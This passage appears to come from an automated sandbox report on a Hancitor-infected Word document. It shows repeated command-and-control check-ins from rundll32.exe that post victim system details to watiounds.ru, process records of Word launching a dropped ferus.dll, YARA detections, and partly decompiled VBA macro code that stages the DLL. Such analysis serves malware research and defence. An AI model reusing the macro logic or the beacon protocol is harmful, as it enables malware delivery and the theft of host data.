                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:03.772407055 CEST133INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:03 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 46 55 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCFUXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          88192.168.2.224925395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:04.091659069 CEST134OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:04.220726967 CEST134INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:04 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4d 4e 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYMNBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          89192.168.2.224925495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:04.551783085 CEST135OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:04.679984093 CEST135INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:04 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 4a 51 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNJQMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          9192.168.2.224917495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:18:33.090591908 CEST26OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:18:33.215881109 CEST26INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:18:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 43 58 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQCXJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          90192.168.2.224925595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:05.013000011 CEST136OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:05.146625042 CEST136INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:05 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 59 42 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTYBGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          91192.168.2.224925695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:05.461169958 CEST137OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:05.587460041 CEST137INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:05 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 41 5a 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVAZEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          92192.168.2.224925795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:05.919809103 CEST138OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:06.051492929 CEST138INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4d 4e 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCMNXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          93192.168.2.224925895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:06.354187965 CEST139OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:06.475883007 CEST139INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 47 54 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCGTXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          94192.168.2.224925995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:06.828737974 CEST140OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:06.957900047 CEST141INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 42 59 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBBYYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          95192.168.2.224926095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:07.290916920 CEST141OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:07.423192978 CEST142INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4b 50 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCKPXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          96192.168.2.224926195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:07.738307953 CEST142OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:07.863718987 CEST143INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4b 50 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCKPXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          97192.168.2.224926295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:08.195903063 CEST144OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:08.325272083 CEST144INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:08 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 47 54 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJGTQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          98192.168.2.224926395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:08.634500980 CEST145OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:08.760154963 CEST145INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:08 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGZATARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          99192.168.2.224926495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:09.081423044 CEST146OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:09.212142944 CEST146INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 42 59 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVBYEARRABw==0


                                          Code Manipulations

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: WINWORD.EXE PID: 2260 Parent PID: 584

                                          General

                                          Start time:08:15:30
                                          Start date:29/04/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                          Imagebase:0x13f590000
                                          File size:1424032 bytes
                                          MD5 hash:95C38D04597050285A18F66039EDB456
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: rundll32.exe PID: 2480 Parent PID: 2260

                                          General

                                          Start time:08:15:34
                                          Start date:29/04/2021
                                          Path:C:\Windows\System32\rundll32.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS
                                          Imagebase:0xff890000
                                          File size:45568 bytes
                                          MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: rundll32.exe PID: 2504 Parent PID: 2480

                                          General

                                          Start time:08:15:34
                                          Start date:29/04/2021
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS
                                          Imagebase:0x7e0000
                                          File size:44544 bytes
                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Hancitor, Description: Hancitor Payload, Source: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Author: kevoreilly
                                          • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Hancitor, Description: Hancitor Payload, Source: 00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp, Author: kevoreilly
                                          Reputation:high

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          VBA Code

                                          Call Graph

                                          Graph

                                          • Entrypoint
                                          • Decryption Function
                                          • Executed
                                          • Not Executed
                                          • Show Help
                                          callgraph 8 Getme Run:2,CreateObject:1,Dir:4,Name:1 187 q2 198 hhhhh Left:2,Run:1,Dir:1 467 cvbc MoveRight:2 198->467 312 hi Run:1 347 q3 358 checkthe Run:1,Dir:2 412 nyd 424 rnee 412->424 434 bcvxzc MoveRight:2 467->434 511 q4 522 q5 528 nm 571 Document_Open 575 stetptwwo Run:1 571->575 575->198 742 chek Dir:1 575->742 808 ks Left:1,Right:1 575->808 834 ksa Left:1 575->834 858 iep 575->858 776 xzczxc 792 vvvvvvvx 808->776 834->792 852 q1 858->187 858->347 858->511 858->522 858->852

                                          Module: Module1

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "Module1"

                                          3

                                          Dim Folders() as String

                                          4

                                          Dim pit as String

                                          Executed Functions
                                          Subroutine Getme, APIs: 10, Strings: 13, Number of lines: 44, Relevance: 54.044
                                          APIsMeta Information

                                          Dir

                                          CreateObject

                                          GetFolder

                                          SubFolders

                                          Name

                                          Dir

                                          Dir

                                          Run

                                          Dir

                                          Run

                                          		Microsoft Word:Application.Run("hi","c:\users\albus\appdata\Local\Temp")
                                          StringsDecrypted Strings
                                          "Scripting.FileSystemObject"
                                          "\furmt.f"
                                          """"
                                          "hi"
                                          """"
                                          "hi"
                                          """"
                                          """"
                                          "hi"
                                          "hi"
                                          """"
                                          "hi"
                                          "hi"
                                          LineInstructionMeta Information
                                          5

                                          Sub Getme(RootPath as String)

                                          6

                                          Dim pafh as String

                                          executed
                                          7

                                          pafh = pit

                                          8

                                          hor = pafh

                                          9

                                          Dim polo as String

                                          10

                                          polo = "Scripting.FileSystemObject"

                                          11

                                          Dim uuj as String

                                          12

                                          uuj = "\furmt.f"

                                          13

                                          strFileExists = Dir(RootPath & uuj)

                                          Dir

                                          14

                                          If strFileExists = "" Then

                                          16

                                          Dim Folder as String

                                          17

                                          Folder = RootPath

                                          18

                                          Dim N as Integer

                                          19

                                          Dim fs, f, f1, fc

                                          21

                                          Set fs = CreateObject(polo)

                                          CreateObject

                                          22

                                          Set f = fs.GetFolder(Folder)

                                          GetFolder

                                          23

                                          Set fc = f.SubFolders

                                          SubFolders

                                          25

                                          N = 0

                                          26

                                          On Local Error Resume Next

                                          27

                                          For Each f1 in fc

                                          28

                                          N = N + 1

                                          29

                                          Redim Preserve Folders(1 To N)

                                          30

                                          Folders(N) = Folder & "\" & f1.Name

                                          Name

                                          31

                                          If Dir(Folders(N) & "\" & uuj) = "" Then

                                          Dir

                                          32

                                          Else

                                          33

                                          Dim kurlbik as String

                                          34

                                          kurlbik = hor

                                          35

                                          If Dir(kurlbik & "\ferus.d" & "l" & "l") = "" Then

                                          Dir

                                          37

                                          kkl = Application.Run("hi", Folders(N))

                                          Run

                                          39

                                          Else

                                          40

                                          Exit Sub

                                          41

                                          Endif

                                          42

                                          Endif

                                          44

                                          Next f1

                                          46

                                          Else

                                          47

                                          Dim nvbv as String

                                          48

                                          nvbv = hor

                                          49

                                          If Dir(nvbv & "\ferus.d" & "l" & "l") = "" Then

                                          Dir

                                          51

                                          kkl = Application.Run("hi", RootPath)

                                          Microsoft Word:Application.Run("hi","c:\users\albus\appdata\Local\Temp")

                                          executed
                                          53

                                          Else

                                          54

                                          Exit Sub

                                          55

                                          Endif

                                          56

                                          Endif

                                          59

                                          End Sub

                                          Subroutine q2, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003
                                          LineInstructionMeta Information
                                          63

                                          Sub q2(dl as String)

                                          64

                                          pit = dl

                                          executed
                                          65

                                          End Sub

                                          Module: Module2

                                          Declaration
                                          LineContent
                                          1

                                          Attribute VB_Name = "Module2"

                                          2

                                          Dim pit as String

                                          Executed Functions
